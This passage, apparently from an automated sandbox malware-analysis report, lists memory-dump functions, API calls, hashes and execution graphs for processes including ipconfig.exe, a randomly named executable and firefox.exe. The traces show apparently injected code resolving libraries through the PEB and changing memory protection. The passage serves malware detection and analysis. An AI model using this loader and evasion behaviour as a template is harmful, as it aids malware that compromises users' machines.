                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                      • Instruction ID: febe786359ad3d82fd2eef7cd931f3007e233692b861c43652fb6fa3bb3bb642
                                                                                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                      • Instruction Fuzzy Hash: 4601B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7240C630E851CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F29B34, Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F29BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
                                                                                                                                                      • Instruction ID: 7cf98cc50881bd4a43fe329dc9f697b4e927fee2cad86a00092d388b416a110a
                                                                                                                                                      • Opcode Fuzzy Hash: 054cadc7798dd47ab44786108dc259e6bc29ebfbb2a475caf3b56ea30b4f020a
                                                                                                                                                      • Instruction Fuzzy Hash: 96F062B6E4011DABDF10DAE5DC52FDDB3B89B05348F1081A5EE1C9B281F6B0E7498B91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F37430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F2CCF0,?,?), ref: 02F3746C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                      • Opcode ID: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                                                                                                                                                      • Instruction ID: b9f85b6e93c596e63d2fbb016957057874978a26594cd3da8d7c71f96206e699
                                                                                                                                                      • Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                                                                                                                                                      • Instruction Fuzzy Hash: B4E06D737802043AE32165A99C02FA7B29D8B81B65F55002AFB4DEA2C0D595F80146A4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F38A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F2CFC2,02F2CFC2,?,00000000,?,?), ref: 02F38A80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction ID: a78bd674682a40510731b65b07221a8454df8df72fc8a54083bfa41ee82a5e6d
                                                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction Fuzzy Hash: 5CE01AB16002086BDB10EF49CC84EE737ADAF88650F018154FA0867241C970E910CBF5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F388B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(02F33536,?,02F33CAF,02F33CAF,?,02F33536,?,?,?,?,?,00000000,00000000,?), ref: 02F388DD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction ID: a38c172d0ccf64a201059804de395c096a255e58a4c13519c7453404416091c3
                                                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction Fuzzy Hash: A4E012B1200208ABDB14EF99CC44EA777ADAF88690F118558FA086B241C670F910CAB0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F2D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F27C83,?), ref: 02F2D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                      • Instruction ID: 2e317a44d6e63fb2a3b21daf97d959368d2c030862f2fa2187ecf6265eb1d15c
                                                                                                                                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                      • Instruction Fuzzy Hash: 12D05E617503082AE610EAA49C12F2632C95B55A84F494064FA48962C3DA54E4008561
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02F2D42F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F27C83,?), ref: 02F2D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_2f20000_ipconfig.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                                                      • Instruction ID: da0de1a44147b6a50605765eb81e8f4b4a51372d877e0c042d3924317751ccf8
                                                                                                                                                      • Opcode Fuzzy Hash: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                                                      • Instruction Fuzzy Hash: ADD05E71B402043AFB10EAB49C12F6A37855F66684F0940A8FA49E72C3DA54D0058620
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A52B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 34de0139ca8de579bd1388d5eff9e2d6164a5b407867c27ed877e9c175d71db7
                                                                                                                                                      • Instruction ID: 686f700665a9ab05d2be0245bd36c16c1a12cd3f125d932d938e5a5b75178dfa
                                                                                                                                                      • Opcode Fuzzy Hash: 34de0139ca8de579bd1388d5eff9e2d6164a5b407867c27ed877e9c175d71db7
                                                                                                                                                      • Instruction Fuzzy Hash: E0B09B719014C5C5DA51DB6057087177908ABD0745F16C457E2460641E873CC091F176
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 03A47550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • Execute=1, xrefs: 03A8451E
                                                                                                                                                      • ExecuteOptions, xrefs: 03A844AB
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A84530
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A8454D
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A84460
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A84507
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A84592
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 83845f5e62506b5b597502046837f008cfa7f659db7030cf732f3b9f8e763184
                                                                                                                                                      • Instruction ID: 59cf4c0d654288c26b29a7408b7dedcd91e115a6875f828ccc67f97fdad92b49
                                                                                                                                                      • Opcode Fuzzy Hash: 83845f5e62506b5b597502046837f008cfa7f659db7030cf732f3b9f8e763184
                                                                                                                                                      • Instruction Fuzzy Hash: A9512931A00359AEEF10EB95DD85FADB3ADEF98304F0404ABE515AB281EB719E41CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03A19046, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, Offset: 039E0000, based on PE: true
                                                                                                                                                      • Associated: 0000000E.00000002.30166774620.0000000003B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_39e0000_ipconfig.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                      • Opcode ID: 4b90d431633bc565e9abeb8e1aa59cb9679308b58a64fcbcf769829ea3ea0862
                                                                                                                                                      • Instruction ID: 81bdb8cf62c684d7e02c95696ae59f1af3203548197f0644fa918c0404d87029
                                                                                                                                                      • Opcode Fuzzy Hash: 4b90d431633bc565e9abeb8e1aa59cb9679308b58a64fcbcf769829ea3ea0862
                                                                                                                                                      • Instruction Fuzzy Hash: 1A812975D002699BDB35CB54CD44BEEB7B8AB08714F0445EBE91ABB290D7709E84CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: k4n8p7lb.exe PID: 5888 Parent PID: 4528 k4n8p7lb.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.5%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:112
                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 988 2a760a7 989 2a7ed02 988->989 992 2a7dca2 989->992 993 2a7dcd1 992->993 1000 2a7f7b6 993->1000 995 2a7dd2a 996 2a7f7b6 3 API calls 995->996 997 2a7dd44 996->997 1010 2a7dd54 997->1010 1001 2a7146e 1000->1001 1001->1000 1002 2a7f8ba LoadLibraryA 1001->1002 1016 2a801bf GetPEB 1001->1016 1004 2a7f91f 2 API calls 1002->1004 1006 2a7f8ca 1004->1006 1005 2a7f893 1018 2a7f91f 1005->1018 1006->995 1009 2a83d15 1009->995 1011 2a7dd84 1010->1011 1012 2a7f7b6 3 API calls 1011->1012 1013 2a7dd98 1012->1013 1014 2a7f7b6 3 API calls 1013->1014 1015 2a7ddb1 1014->1015 1017 2a801e1 1016->1017 1017->1005 1020 2a7f967 1018->1020 1021 2a7f8a3 1020->1021 1022 2a7fae6 1020->1022 1021->1002 1021->1009 1023 2a7146e 1022->1023 1024 2a7f8ba LoadLibraryA 1023->1024 1025 2a801bf GetPEB 1023->1025 1032 2a7fd11 1023->1032 1026 2a7f91f GetPEB 1024->1026 1027 2a7f893 1025->1027 1028 2a7f8ca 1026->1028 1029 2a7f91f GetPEB 1027->1029 1028->1020 1030 2a7f8a3 1029->1030 1030->1024 1031 2a83d15 1030->1031 1031->1020 1032->1020 1046 2a762c4 1049 2a7f1c0 1046->1049 1048 2a762ca 1050 2a7146e 1049->1050 1050->1048 1051 2a7f8ba LoadLibraryA 1050->1051 1052 2a801bf GetPEB 1050->1052 1053 2a7f91f 2 API calls 1051->1053 1054 2a7f893 1052->1054 1055 2a7f8ca 1053->1055 1056 2a7f91f 2 API calls 1054->1056 1055->1048 1057 2a7f8a3 1056->1057 1057->1051 1058 2a83d15 1057->1058 1058->1048 1064 2a7d961 1065 2a7d979 1064->1065 1068 2a7d981 1065->1068 1069 2a7d98a 1068->1069 1072 2a7d9e4 1069->1072 1073 2a7d9ed 1072->1073 1074 2a7f7b6 3 API calls 1073->1074 1075 2a7da14 1074->1075 1076 2a7f7b6 3 API calls 1075->1076 1077 2a7da2c 1076->1077 1078 2a7f7b6 3 API calls 1077->1078 1079 2a7da46 1078->1079 1080 2a7f7b6 3 API calls 1079->1080 1081 2a7da5e 1080->1081 1082 2a7f7b6 3 API calls 1081->1082 1083 2a7dab8 1082->1083 1084 2a7f7b6 3 API calls 1083->1084 1085 2a7dad8 1084->1085 1086 2a7f7b6 3 API calls 1085->1086 1087 2a7daf9 1086->1087 1088 2a7f7b6 3 API calls 1087->1088 1089 2a7db10 1088->1089 1090 2a7f7b6 3 API calls 1089->1090 1091 2a7db28 1090->1091 1092 2a7f7b6 3 API calls 1091->1092 1093 2a7db90 1092->1093 1094 2a7f7b6 3 API calls 1093->1094 1095 2a7dbb9 1094->1095 1096 2a7f7b6 3 API calls 1095->1096 1097 2a7dbde 1096->1097 1098 2a7f7b6 3 API calls 1097->1098 1099 2a7dbfb 1098->1099 1100 2a7f7b6 3 API calls 1099->1100 1101 2a7dc0d 1100->1101 1102 2a7f7b6 3 API calls 1101->1102 1103 2a7dc62 1102->1103 1104 2a7f7b6 3 API calls 1103->1104 1105 2a7dc78 1104->1105 1106 2a7f7b6 3 API calls 1105->1106 1107 2a7dc8f 1106->1107 1108 2a7dca2 3 API calls 1107->1108 1109 2a7de3f 1108->1109 1037 2a70c8e 1038 2a7e4b8 1037->1038 1039 2a7dd54 3 API calls 1038->1039 1040 2a7e512 1039->1040 975 2a72536 976 2a72563 975->976 976->976 979 2a81dff 976->979 982 2a81d93 979->982 981 2a725fa 983 2a82897 982->983 984 2a82909 NtProtectVirtualMemory 983->984 984->981 1042 2a70590 1043 2a7f7b6 3 API calls 1042->1043 1044 2a705ab 1043->1044 1059 2a8073f 1060 2a80744 1059->1060 1060->1059 1061 2a801bf GetPEB 1060->1061 1063 2a807f7 1060->1063 1062 2a81465 1061->1062 985 2a73c3f 986 2a7c311 TerminateProcess 985->986 1045 2a7c3fe GetPEB

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 02A7FAE6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02A7F8BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: wEj
                                                                                                                                                      • API String ID: 1029625771-1518881957
                                                                                                                                                      • Opcode ID: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction ID: 1df5274fbd9acda8a51d6c923cf7dd9a718c8356a7f230b152608454a621fbd1
                                                                                                                                                      • Opcode Fuzzy Hash: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction Fuzzy Hash: 52612A757413865FEF349E748DF43EA36535FA23A0F98462ECC868B284DB358685C705
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02A82897, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 87 2a82897-2a82955 NtProtectVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02A82953
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                      • Opcode ID: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction ID: 30e652f02e2b11f9ff611a4357b0be621ef447183133a2195c423c9c6f8c1cf2
                                                                                                                                                      • Opcode Fuzzy Hash: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction Fuzzy Hash: 11016D706482459FEB28DE28DD447EAB7E7AFD4300F45842DAC8997204C7709D45CA15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02A7F7B6, Relevance: 1.6, APIs: 1, Instructions: 109libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02A7F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction ID: a28ca8613d47ef9bd70a9df2cf9cd81e9a943df37496ec382d4f55bf15e7353b
                                                                                                                                                      • Opcode Fuzzy Hash: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction Fuzzy Hash: DC315676B80248DFDF249F649D943DD7BB2AF973A0F380128DC459B200DB318A86CB85
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02A7F1C0, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02A7F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction ID: 1020c9c2fa370f2df9beb2e575e49a823956c72d9d99a8d9e95930ba85f589e5
                                                                                                                                                      • Opcode Fuzzy Hash: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction Fuzzy Hash: 87312E36A403099FDF30AF249D947DE37A7AF967A0F9001299C498B200DB318A46CB45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02A73C3F, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 83 2a73c3f-2a7c3f9 TerminateProcess
                                                                                                                                                      APIs
                                                                                                                                                      • TerminateProcess.KERNELBASE(-2F895780,F9BA47BC,C5C0FA4A,?,00000026), ref: 02A7C3EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_23_2_2a70000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                      • Opcode ID: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction ID: 4bb9f6070256d0d44f755182b417c11de4decff90c17cf21febb43c24c1ab2ce
                                                                                                                                                      • Opcode Fuzzy Hash: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction Fuzzy Hash: 43F02870244B82CFCB308E648DE5BDE23775FCA254F809169DD454A14AD3350980C606
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Analysis Process: firefox.exe PID: 7688 Parent PID: 4888 firefox.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:1.5%
                                                                                                                                                      Total number of Nodes:734
                                                                                                                                                      Total number of Limit Nodes:23

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 5427 2062223e3e6 5428 2062223e434 5427->5428 5429 2062223e41b 5427->5429 5430 20622241412 LdrLoadDll 5429->5430 5430->5428 5431 206222436e8 5434 20622242762 5431->5434 5433 20622243707 5435 2062224276b 5434->5435 5436 20622242770 5435->5436 5440 2062224277c 5435->5440 5437 2062223ff12 LdrLoadDll 5436->5437 5438 20622242775 5437->5438 5438->5433 5439 206222428fa 5439->5433 5440->5439 5441 2062223e0a2 LdrLoadDll 5440->5441 5442 206222427dc 5441->5442 5442->5439 5443 2062223a362 LdrLoadDll 5442->5443 5444 206222427ec 5443->5444 5444->5439 5445 2062224280d 5444->5445 5447 2062224281a 5444->5447 5448 20622242815 5444->5448 5446 206222408a2 LdrLoadDll 5445->5446 5446->5448 5447->5448 5449 206222394b2 LdrLoadDll 5447->5449 5448->5439 5453 2062223c812 3 API calls 5448->5453 5450 20622242835 5449->5450 5451 206222408a2 LdrLoadDll 5450->5451 5452 2062224283d 5451->5452 5454 20622242894 5452->5454 5459 2062224285f 5452->5459 5455 206222428d9 5453->5455 5458 20622239372 LdrLoadDll 5454->5458 5456 20622241412 LdrLoadDll 5455->5456 5457 206222428f6 ExitProcess 5456->5457 5458->5448 5460 2062223f4e2 LdrLoadDll 5459->5460 5461 20622242872 5460->5461 5461->5433 5139 2062223cb69 5142 2062223cb6e 5139->5142 5140 20622241412 LdrLoadDll 5141 2062223cc35 5140->5141 5143 2062223f4e2 LdrLoadDll 5142->5143 5144 2062223cc18 5142->5144 5143->5144 5144->5140 5368 20622239caf 5369 20622239cdb 5368->5369 5381 20622239d49 5368->5381 5370 20622240d02 2 API calls 5369->5370 5369->5381 5371 20622239d16 5370->5371 5372 20622239d45 5371->5372 5374 20622239902 2 API calls 5371->5374 5373 20622240d02 2 API calls 5372->5373 5372->5381 5377 20622239d6a 5373->5377 5375 20622239d36 5374->5375 5375->5372 5376 206222397d2 2 API calls 5375->5376 5376->5372 5378 2062223f4e2 LdrLoadDll 5377->5378 5377->5381 5379 20622239dd0 5378->5379 5380 20622241412 LdrLoadDll 5379->5380 5380->5381 5145 20622239f6e 5146 20622239f91 5145->5146 5149 20622239faa 5145->5149 5150 206222390f2 5146->5150 5151 206222391af 5150->5151 5152 20622239109 5150->5152 5156 20622239012 5152->5156 5154 20622239118 5160 20622241a52 5154->5160 5158 20622239031 5156->5158 5157 206222390cd 5157->5154 5158->5157 5159 20622241a52 LdrLoadDll 5158->5159 5159->5157 5161 20622241a85 5160->5161 5162 20622241b4e 5161->5162 5173 20622241aef 5161->5173 5177 2062223e452 5161->5177 5165 